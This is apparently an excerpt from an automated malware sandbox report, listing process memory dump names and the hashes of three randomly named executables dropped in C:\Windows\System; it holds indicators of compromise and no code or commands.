memory/3212-1481-0x00007FF631560000-0x00007FF631956000-memory.dmp

C:\Windows\System\UHHVTPZ.exe

MD5 f17124f53d4346379a524ecd71741a97
SHA1 3f0ee95395e2ae5d03f084828f73dbe51ccd5598
SHA256 0838a6088810df3bf5fa43f9d2cd584d886c4d0b02ad9c3c5c9dbe402d160848
SHA512 933142aeaa764824a45e0fdf6d0c61e941979fab414e5ac159dd5ed149110ab638be333e2612eb74fbaecfd12fad5612bab639c0780ac294608ad63973d91056

C:\Windows\System\wQplFun.exe

MD5 d860738bf832484d7a850e7bffa44042
SHA1 279033269d62d4176ccf050bb51487b002d09ad8
SHA256 d615197da06bc8f1911720bf91ad9aa4d4b5df01355272ee38951e34062c8836
SHA512 ccf9f8e845dfbb09aad36ce5e0845d305a0228e3708fc3f8208fc3017d45aa2622404d73bb5453102ddf18a2b2ae1094a5003f3c3353f49537148991e90f5386

memory/1448-92-0x000002256EF40000-0x000002256F6E6000-memory.dmp

memory/1456-1669-0x00007FF701FC0000-0x00007FF7023B6000-memory.dmp

memory/4600-1675-0x00007FF785070000-0x00007FF785466000-memory.dmp

memory/5080-1782-0x00007FF68D240000-0x00007FF68D636000-memory.dmp

memory/2252-1773-0x00007FF603D80000-0x00007FF604176000-memory.dmp

memory/1376-1786-0x00007FF75EDF0000-0x00007FF75F1E6000-memory.dmp

memory/3304-1829-0x00007FF6DE090000-0x00007FF6DE486000-memory.dmp

memory/3284-1879-0x00007FF7CB220000-0x00007FF7CB616000-memory.dmp

memory/644-1884-0x00007FF694250000-0x00007FF694646000-memory.dmp

memory/4132-1887-0x00007FF6B85B0000-0x00007FF6B89A6000-memory.dmp

memory/2940-1862-0x00007FF7F4100000-0x00007FF7F44F6000-memory.dmp

memory/1932-1846-0x00007FF758240000-0x00007FF758636000-memory.dmp

C:\Windows\System\aaCGbAw.exe

MD5 fbef424b1922acb531e69f596a8b8921
SHA1 584ada3a02d95facb3db59252be930cc2019a07e
SHA256 9ba99dfe86f586665444906d4d6c065235a1faa079a57e34597feec2870450c4
SHA512 b7c856eeb52f1f5b978a86cc276964a598136109586a3999d60402c0885755b7f0a6e5ca90b5856e8f2e8d74fc885b0d7e257ea62c297369572d765724b94880

memory/1064-1845-0x00007FF780190000-0x00007FF780586000-memory.dmp

memory/3612-1843-0x00007FF767B50000-0x00007FF767F46000-memory.dmp

memory/4036-1832-0x00007FF72FBC0000-0x00007FF72FFB6000-memory.dmp

memory/4908-1827-0x00007FF629F40000-0x00007FF62A336000-memory.dmp

memory/3536-1825-0x00007FF70F0E0000-0x00007FF70F4D6000-memory.dmp

memory/2712-1804-0x00007FF65F020000-0x00007FF65F416000-memory.dmp

memory/4928-1762-0x00007FF759630000-0x00007FF759A26000-memory.dmp

memory/3020-1706-0x00007FF60A720000-0x00007FF60AB16000-memory.dmp

memory/2316-1693-0x00007FF634A40000-0x00007FF634E36000-memory.dmp

memory/3992-1678-0x00007FF767DC0000-0x00007FF7681B6000-memory.dmp